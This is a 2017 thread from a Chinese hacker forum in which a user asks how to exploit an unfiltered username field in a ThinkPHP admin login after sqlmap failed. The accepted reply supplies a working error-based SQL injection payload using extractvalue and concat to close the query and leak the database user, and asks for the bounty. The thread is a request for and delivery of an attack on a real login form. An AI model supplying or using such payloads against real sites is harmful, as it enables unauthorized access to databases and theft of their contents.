红客联盟 - 由08安全团队运营

红客联盟 - 由08安全团队运营»社区首页 › 技术攻防 › 技术交流 › 注入求助，SELECT * FROM `dd_admin` WHERE ( username= ...

返回列表发帖

查看: 3055|回复: 1

注入求助，SELECT * FROM `dd_admin` WHERE ( username='admin'' ) LIMIT 1

发表于 2017-8-5 11:06:15 | 显示全部楼层 |阅读模式

悬赏10i币已解决

thinkphp框架，后台登陆username未过滤，SELECT * FROM `dd_admin` WHERE ( username='admin'' ) LIMIT 1，sqlmap也无法注入，求大神！

最佳答案

查看完整内容

')and extractvalue(1,concat(0x7e,user()))%23 ko. i币转来吧！

回复

使用道具举报

发表于 2017-8-5 11:06:16 | 显示全部楼层

')and extractvalue(1,concat(0x7e,user()))%23
ko. i币转来吧！

回复

使用道具举报

返回列表发帖

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

应急响应中心

联系我们

官方QQ群：112851260

官方邮箱：security#ihonker.org（#改成@）

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-6-16 18:19 , Processed in 0.066153 second(s), 26 queries , Gzip On.

Powered by ihonker.com

Copyright © 2015-现在.

返回顶部